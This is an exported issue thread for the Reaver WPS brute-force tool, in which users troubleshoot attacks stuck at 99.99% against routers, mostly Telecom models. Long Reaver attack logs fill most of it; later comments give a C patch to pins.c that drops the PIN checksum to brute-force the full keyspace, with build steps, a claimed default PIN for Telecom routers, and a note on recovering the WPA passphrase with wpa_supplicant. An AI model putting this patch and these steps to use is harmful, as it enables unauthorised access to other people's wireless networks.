realing / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Stuck 99.99%, repeats one key #195

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 10.10

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

4. What is the manufacturer and model # of the device you are trying to
crack?

43db

5. What is the entire command line string you are supplying to reaver?

sudo reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -a and sometimes -p argument

6. Please describe what you think the issue is.

I don't know, it stucks to 99% and keeps repeating the same PIN.

7. Paste the output from Reaver below.

It's big so I put it here http://pastebin.com/raw.php?i=RDzF0FBz

Original issue reported on code.google.com by darknw...@gmail.com on 28 Jan 2012 at 10:30

GoogleCodeExporter commented 9 years ago
nobody?

Original comment by darknw...@gmail.com on 30 Jan 2012 at 4:32

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Also I've got the same problem... exist a resolution????

Original comment by davidewe...@gmail.com on 30 Jan 2012 at 8:28

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Ubuntu 11.10
  wireless: Broadcrom
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[?] Restore previous session for D4:D1:84:DD:0A:43? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from D4:D1:84:DD:0A:43
[+] Switching mon0 to channel 1
[+] Associated with D4:D1:84:DD:0A:43 (ESSID: Telecom-81594941)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:53:33 (10 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:53:53 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:14 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:54:35 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:54 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:55:16 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

Original comment by davidewe...@gmail.com on 30 Jan 2012 at 9:02

GoogleCodeExporter commented 9 years ago
my too have similar problem but i don't know what happen :(

Original comment by vladys.3...@gmail.com on 31 Jan 2012 at 2:27

GoogleCodeExporter commented 9 years ago
nobody??

Original comment by davidewe...@gmail.com on 3 Feb 2012 at 2:37

GoogleCodeExporter commented 9 years ago
#wps transaction failed (code: 0x02), re-trying last pin
#wps transaction failed (code: 0x03), re-trying last pin

I've experienced the same issues using an Alfa rtl8187. I've found the solution 
to the problem is to play with the "-d" flag.

Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code: 
0x03) errors. Then work your way down. Each router I've tested likes a 
different value. 

I was also using the "--no-nacks" argument.

Original comment by cryptom...@gmail.com on 4 Feb 2012 at 6:07

GoogleCodeExporter commented 9 years ago
Hi

I have exactly the same problem 
I also try -d 15 or -N and this solution 
http://code.google.com/p/reaver-wps/issues/detail?id=88#c4
but it didn't work !

this is my log file
root@bt:~# reaver -i mon0 -b 00:1E:E3:EA:FE:27 -L -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[?] Restore previous session for 00:1E:E3:EA:FE:27? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from 00:1E:E3:EA:FE:27
[+] Switching mon0 to channel 1
[+] Associated with 00:1E:E3:EA:FE:27 (ESSID: WLAN_FE27)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.00% complete @ 2012-02-09 00:18:43 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.04% complete @ 2012-02-09 00:18:58 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
^C
[+] Session saved.

and you can download my capture file from here

http://www.mediafire.com/?kzc5utohkjlo67l

it seems there is bug in reaver 1.4 ( stable version )

please consider this issue
I am looking forward to hearing from you soon

Original comment by saeed.y2...@gmail.com on 9 Feb 2012 at 6:57

GoogleCodeExporter commented 9 years ago
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

-76 db

4. What is the manufacturer and model # of the device you are trying to
crack?

ADB Broadband Italia/Pirelli

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv --win7 --no-nacks --dh-small -d 10/15 
-c 6 

6. Please describe what you think the issue is.

It seems like the 1st part of the pin 0123 it`s correct and starts with 90% 
completed. Runs till 99.99% last pin 01239980.
At start ... right after the 90% complete ... if i open the mac.wpc at the 1st 
line the number it`s 2 - after reading some docs that means the pin it`s fully 
broken

7. Paste the output from Reaver below.

2
5
1
1234
0000
0123
1111
2222
3333
4444
5555
6666
7777
8888
9999
0001
....

Original comment by music.an...@gmail.com on 16 Feb 2012 at 7:00

GoogleCodeExporter commented 9 years ago
I only have sucess using backtrack with -50 signals or higher -45 -40 and so on.

So try to get closer. In Backtrack "the less the better"

Original comment by frederi...@gmail.com on 20 Feb 2012 at 4:34

GoogleCodeExporter commented 9 years ago
Hey .. it seems all Telecom routers are the same .. it gives me the same error,
the 1st 4 digits are correct : 0123 . but the rest is all wrong ..
i can't understand if it's a time of protection or what..
btw i tried on an another telecom router and same thing.

i have access to the 1st one but the pin isn't written anywhere .. i looked 
around in the settings and info .. but couldn't find the correct one.
it seems the router generates the pin once the button has been clicked.

Original comment by richardj...@gmail.com on 20 Feb 2012 at 11:40

GoogleCodeExporter commented 9 years ago
Same thing here with Telecom router. 

Original comment by fiftyeig...@gmail.com on 21 Feb 2012 at 4:31

GoogleCodeExporter commented 9 years ago
I wanted to add as issue ... wps protection enabled but the method to register 
with the AP it`s by "Push Button" instead Pin.
Btw richardj ... i tested on a telecom modem also :) .

Anyway i think that wash+reaver should make the difference between push button 
and pin . Will save us from a lot of wsted time :D

Original comment by music.an...@gmail.com on 22 Feb 2012 at 6:08

GoogleCodeExporter commented 9 years ago
It shouldn't matter if it's a push button pin. You still can become a registrar 
by trying out all the pins. It must be something else.

Original comment by fiftyeig...@gmail.com on 26 Feb 2012 at 12:59

GoogleCodeExporter commented 9 years ago
3rd Telecom modem/router - same old damn issue :) 0123 correct . 2nd part waste 
of time.
Off-topic: I hate Telecom :)

Original comment by music.an...@gmail.com on 18 Mar 2012 at 7:55

GoogleCodeExporter commented 9 years ago
Hi All
I have sams issuse , how to fix ? I use rever -1.3 and rever 1-4. But don't 
work all

Original comment by alksande...@gmail.com on 18 Mar 2012 at 11:43

GoogleCodeExporter commented 9 years ago
I tested many ADSL modems .....Planet ADW-XXXX .....such problem with rlt 8187b 
and Ar9002WB-1NG ...BACKTRACK 5 R2.... They are telecome too!!! please help

Original comment by klui...@gmail.com on 23 Mar 2012 at 8:55

GoogleCodeExporter commented 9 years ago
Any body could analysis the problem ?

Original comment by saeed.y2...@gmail.com on 23 Mar 2012 at 9:14

GoogleCodeExporter commented 9 years ago
Somebody knows as to write to the author of the program directly?

Original comment by klui...@gmail.com on 23 Mar 2012 at 9:26

GoogleCodeExporter commented 9 years ago
This proplems is only with telecom modems!!!!! PLEASE HELP!!!!!

Original comment by klui...@gmail.com on 23 Mar 2012 at 9:27

GoogleCodeExporter commented 9 years ago
telecom of which country? :D

Original comment by livewin...@gmail.com on 27 Mar 2012 at 8:29

GoogleCodeExporter commented 9 years ago
pridnestrovian moldavian republic

Original comment by klui...@gmail.com on 28 Mar 2012 at 8:46

GoogleCodeExporter commented 9 years ago
I had reformatted my system just cause I allocated partitions wrong...after 
installing BT5R1 
I started getting this error...I did apt-get update to make sure I was upto 
date.

---Then I got the wicd dsub interface error which I corrected with : 

-reconfigure wicd
update-rc.d wicd defaults

---Still, got the repeating error stuck at 99.9% so I went and did this POST #3 
:

http://code.google.com/p/reaver-wps/wiki/Resources

---Still getting the error after all that, I decided I'd start the process over 
and not resume...lo and behold it got all the wps and wpa keys.

In my troubleshooting process I removed macchanging as I find it to give me 
errors every so often

My cli started out as :

Reaver -i xxxx -b xx xx xx xx -w -N -S --mac=xx xx xx xx

Then it ended up as 

Reaver -i xxxx -b xx xx xx xx -w -N -S -l 300 

Not sure if this will help anyone, but this is what I did to get past the 99% 
problem.

Original comment by xpresspa...@gmail.com on 24 May 2012 at 6:43

GoogleCodeExporter commented 9 years ago
I was having the same problem also, I had manually put the first half of the 
pin trying to accelerate the the process and started at 90.01 % then it was 
trying different pins but only the second half was changing since I had put the 
first half manually. After it reached 99.99% it stopped trying different pins, 
so I terminated the process and started from scratch this time without manually 
putting in the first half of the pin. Then I saw that the first half was wrong 
even though it started at 90.01%. Mind you I never saw a "Receive M5 or M6 
message " when the first half of the pin was wrong. Probably start over again 
and see if it works without the -p argument.

Original comment by Leonardo...@gmail.com on 31 Aug 2012 at 5:19

GoogleCodeExporter commented 9 years ago
Good evening
I can tell you the reason for this issue and how to solve. I came across the 
solution in these last 3 days spare time. it took me some "mumble mumble" and a 
little bit of coding.

You get 99.99% and stuck because reaver has attempted all the pins that knows.
So what if the right pin is not in the knowledge of reaver?

While the first 7 digit are consecutive numbers last digit is a checksum.
so reaver attempt 10^7 pins not 10^8 (and that's good!)

But what if the target AP PIN is one of the 9000 not computed?

Solution:
With a exhaustive attempting (small modification of code under /src/) in the 
range from 01230000 to 01239999 you will find the right pin (first 4 digit are 
those recognized by reaver).
These are 10^4 pins that for 7sec./pin it will take 19hours and 30minutes to 
look for them all.

conclusion:
luckily it took me 5hours (more or less 2500 attempted pin), thats because of 
how I implemented the exhaustive algorithm and because the pin was 01234567 
(yes seriously, you can expect others to be 12345678).

next issue:
a this point reaver communicate that this is the right pin but doesn't give WPA 
PSK.
I used the wpa_supplicant & wpa_cli method (issue 203 comment 6) and it works 
like a charm! 
now the problem is that after retrieving psk and connected with success, AP has 
turned off WPS, I don't mean WPS LOCK, I mean there is no more the AP under 
WASH and if try to associate thru aireplay (I always used it to associate 
during pin attempts) give this error message:Denied (code 12), wrong ESSID or 
WPA ? 

from now I will shut connection with this AP for 12 hours to see if it turns 
WPS up again.

hope that all the things I wrote are interesting for someone!

saluti!

Original comment by stefano....@gmail.com on 5 Sep 2012 at 12:29

GoogleCodeExporter commented 9 years ago
I got some news

shutting connection it's useless about WPS reactivation.

!!! after 48 hours the AP has rebooted by itself reactivating WPS with same old 
pin. !!!

yesterday I tried to reactivate from telnet but there is no command to 
accomplish the task (some router has it).

from 'system shell' I found some directories named "wps...." but didn't had 
time to discover.

a couple of thing about this AP I found in 'system ver':
Version: 4.5.3.AGPWI_1.0.3
Platform: P.DG A4001N

that's all folks!
saluti!

Original comment by stefano....@gmail.com on 7 Sep 2012 at 6:26

GoogleCodeExporter commented 9 years ago
So you got through the 99,99% error by adding some modifications into /scr/???
Would you please share your modifications here? I'm dealing with this issue as 
well: I'm testing Reaver with many different commercial routers I own, but it 
doesn't seem to work with any of them....and the developer has not been 
updating it in months....

Thanks in advance

Original comment by Twai...@gmail.com on 11 Sep 2012 at 2:57

GoogleCodeExporter commented 9 years ago
I'm dealing with this issue as well 99.99%.on BT5 R1 BT5 R3> reaver 1.3 or 1.4 
.Please help.

Original comment by bemono...@gmail.com on 14 Sep 2012 at 4:55

GoogleCodeExporter commented 9 years ago
Stefano, thank you very much!
As described in issue 203 comment 6, wpa_supplicant works perfectly. My Telecom 
was 01234567 too. It seems all Telecom routers have this pin by default.
It would be very useful if there was an option in reaver to ignore calculation 
and bruteforce last checksum digit.

Original comment by dnd...@gmail.com on 24 Sep 2012 at 6:05

GoogleCodeExporter commented 9 years ago
Has anyone managed to work out what modifications Stefano made ? :(

Original comment by keyfo...@veryrealemail.com on 24 Sep 2012 at 10:04

GoogleCodeExporter commented 9 years ago
Stefano seems to have found the problem to the block, could you post the 
changes you made, so that you can imitate? thank you very much
ps sorry for my english    :-)

Original comment by leonardo...@hotmail.it on 29 Sep 2012 at 5:23

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Stefano, I have 99.99% problem too. Where I found the modifications pins.c for 
resolve this and how to implement it? If I use reaver-1.4 the first 4 digits 
PIN is 1234 ever and it happens 99.99% problem. On reaver-1.3 the first 4 
digits are variable but no crack PIN found.

Original comment by mradulov...@gmail.com on 9 Oct 2012 at 1:16

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
... and reaver start from 90%. I tried -p option with 0123,0000, always the 
same.
The signal strenght is -78 to -82, maybe that's the problem?

Original comment by mradulov...@gmail.com on 10 Oct 2012 at 9:38

GoogleCodeExporter commented 9 years ago
@ Stefano (comment 33):
I tried the wpa_cli method you suggested with what should be T*****m's default 
wps pin, but no luck, so I guess I'll need to figure out and push in your 
modifications,to test my routers against it.
I read both the info links and the pins.c file you mentioned above, but no luck.
I'm no coder at all but, afaik, the only way should be changing the code to 
make pin tests try combinations starting with a '0' , as well as ordinary 
ones...am I right?
As I said, I'm no coder, but I'll appreciate any help on the matter at hand...

Original comment by Twai...@gmail.com on 13 Oct 2012 at 10:12

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
So how do we edit the source (I'm assuming pins.c) to not do the sumcheck and 
instead check the entire keyspace? Can you be specific on what needs changed?

Original comment by ingen...@gmail.com on 16 Oct 2012 at 6:01

GoogleCodeExporter commented 9 years ago
First of all excuse my english.

@ Stefano hit the point.

I had the same problem, after many tries i only got the first part of the Pin, 
and it stucks on 99.99% trying the same pin.

I looked to the pins.c and i made a quick fix, the idea is:

First: Tries ALL the keys, ending by 0. If u have the first part of the pins, 
it takes 1000 tries. (tries -p xxxx0000 and u will see reaver changes it to 
xxxx0002, so the pin xxxx0000 will never be tested).

Second: If the pin not ends by 0, tries all the pins ended by 1, after that, 
ended by 2, etc...

So i change the line

snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key)));

for

snprintf(pin, pin_len, "%s%d", key, 0);

Look at the change, i changed wps_pin_checksum(atoi(key)) for '0' , that's is 
it will generate keys ended by 0.

After tried all the keys ended by 0, with no luck, i probed this

snprintf(pin, pin_len, "%s%d", key, 1); --> All the keys endend by one.

I got luck, the key ended by 1, and got found at 93.15%

(Remember, after editing the pins.c, do 

gcc -c pins.c
make
make install

I know it's a not well done fix, but i'm not a c programmer.

Hope help someone.

Original comment by Tys...@gmail.com on 21 Oct 2012 at 8:45

GoogleCodeExporter commented 9 years ago
I'm proud of you Tystar! 
You tried harder than anybody else looking for the insight and then you saw the 
light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transaction so it's not giving you continuously 
"timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve these information using original reaver before applying the 
modification.
--------------------------------------------------------------------------------
-------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION 
(modified):

/* EXHAUSTIVE MOD. init */
/*
 * in these lines trivial modifications are applied over the original code.
 * these lines have to be considered for demonstration purpose only.
 * WPA PSK retrieval is not granted.
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);

                /* Generate a 7-digit pin */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));

                /* Append last digit */
                snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

                free(key);

        if(exhaustive_last_digit==0)
        {
            if(exhaustive_index==999)
            {
                cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
                /* Clean up and get out */
                globule_deinit();
                exit(EXIT_FAILURE);         
            }
            exhaustive_index++;
            exhaustive_last_digit=9;
        }else{
            exhaustive_last_digit--;
        }
        }

        return pin;
}

/* EXHAUSTIVE MOD. end */

-actual reaver have to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-modified reaver have to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
--------------------------------------------------------------------------------
-------------
call reaver with the option -p 0123 where "0123" are the pin first 4 digits.
if you don't specify these 4 digits worst-case will take at least 10 years 
(3sec/pin * 10^8pin). 
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 
10^4).

to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe 
somewhere.
uninstall and install with same commands as above.

Original comment by stefano....@gmail.com on 22 Oct 2012 at 8:57

GoogleCodeExporter commented 9 years ago
 Sorry , about my English.. 
I have %99.9 problem too reaver 1.4 [it starts %90]  (first four digit 1234.) 
But when I tried reaver 1.3 [it starts %0.0] However it stuck 90.9 with the 
same pin->(first four digit 5323)  and I am trying to find solution..
STEFANO I did your solution alternately. But 'reaver' didn't open after I wrote 
these to consol " 
cd /root/reaver-wps-read-only/src
./configure
make distclean  
cd /root/reaver-wps-read-only/src
./configure
make
make install  
"
The second questions: Are we sure about stuck pin%99 (1234....) is the correct 
first four digit? 
Finally: in pins.c folder , we erase everything inside and copy your things is 
it true ?? Help pls, I am a bit of noob. :) Thanks a lot!

Original comment by cyberfa3...@gmail.com on 24 Oct 2012 at 4:37

GoogleCodeExporter commented 9 years ago
Stefano I solved my 2 problems :) and being pinned reaver 1.3 (modified) it's 
about %25 now . But still I am not sure about stuck pin first four digit (1234) 
are correct :((

Original comment by cyberfa3...@gmail.com on 25 Oct 2012 at 4:48

GoogleCodeExporter commented 9 years ago
reaver 1.4 stuck %99 1234abcd ,, reaver 1.3 stuck differet pins 5041klmn what 
can I do? There is no solution for me?!   

Original comment by cyberfa3...@gmail.com on 28 Oct 2012 at 2:51

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
same problem
same pin 12349982

Original comment by sergey...@gmail.com on 29 Jan 2013 at 3:05

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
guys wht can i do for stuck %90.90

Original comment by s.wra...@gmail.com on 12 Apr 2013 at 9:56

GoogleCodeExporter commented 9 years ago
Stefano,
I'm not shure that the mod at #41 post is correct.

